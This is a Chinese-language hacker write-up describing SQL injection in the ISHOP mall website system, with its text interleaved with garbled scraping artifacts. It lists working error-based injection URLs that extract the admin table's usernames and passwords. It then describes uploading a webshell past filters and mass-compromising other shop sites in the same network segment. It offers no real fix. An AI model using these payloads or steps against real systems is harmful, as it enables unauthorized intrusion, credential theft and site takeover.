ISHOP商场建站系统注入漏洞

admin

发现一个注入点
7 M& V1 j; w  H2 H* b" ^; U& ^http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
( Q! u% }  r5 B! {, o+ e5 D
习惯性的加’having1=1--

$ D: u3 R* Y# Khttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—

0

. u+ d/ h! d$ _0 w6 t爆出Diary_A.dl_Title（这时候很激动啊）

" H; a. f+ G0 J5 @. b% c那么继续
5 t& Z& C% b' j$ [8 m7 J5 phttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—

7 I7 Z  }- c, T* j继续，一直爆下去

爆到几个字段和表段 但是没找到需要的管理用户的字段
- c2 Y/ x8 L; f" g' Q
蛋疼了 怎么办 然后去后台登陆页看源码
1 ~( C. i, b; y/ m' ~' k
0

Input name= “ADUID”
' B. b* @" |: N! t" e! w+ S7 f, C) `Input name= “ADPWD”
1 I( b7 {, [6 B- ?* y& F0 ]
很幸运 找到了字段那就继续
  n6 J5 b0 v3 N找到之后开始爆用户
) L: ?3 X) T0 h& E5 khttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
爆密码
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
& p6 q& r3 F3 y' V4 H测试了下 这个注入点只能爆到文章哪里的表

0 g) P, r$ v0 A  F9 G+ Q头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了

/ Q* m5 W# G5 V4 O又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了

473
2 ?% K6 ?; F6 r# M( E
进后台


1 C% f# y2 ~$ f0 ]( g: k) ?: s6 A发现几个上传点 有的地方不能上传 而且防止恶意代码
3 O4 H' B% S9 }) D- O; ~8 e
  A5 T2 A  I; y1 L( }没办法 各种百度各种找大牛 找到一只好像可以突破的马
6 W! U+ v3 o' s; j" C7 G: a; ~" i

在系统管理那里直接上传 不过没有显示地址
+ H% C% y( w/ w- g" o6 Z) V
再上传一次 抓包 搞定OK
8 b% k  Y* g( Y6 z8 _$ l! I
: h) F( h  K" S! }

472

" T7 U5 d6 [7 Y晚上不行了 去睡觉。。。
. d9 w' S' j3 W- U第二天刚起床 闲的没事做继续日站吧

. j3 B- ^2 l8 Y* X2 @找个站 就把这个站的旁c扫了下

发现c段也有一个购物站 ，然后还和这个站的模板差不多

就找到会员登录口测试
' K& ^8 t* W9 v. I! y2 B
1 |/ W2 l6 g" {8 |( b4 _7 T'and (select top 1 MGR_UID from A_MGR)>0—
果断爆到了 这时候我很激动 通杀

! `& a$ G2 t4 @( y% Y+ Y再次翻c段

翻出几个站 都成功拿下
7 p6 l" D* _' J* |# f* u


# {  ]/ _/ v0 h- d' ?修复方案：
; p/ n7 Y! e0 I* u他们比我专业
  z& f/ J8 t- H! B​

3 L0 j  x+ y3 g- f% ?7 U  L
! L) ?) \5 o) }" ]8 ]  ^$ B) @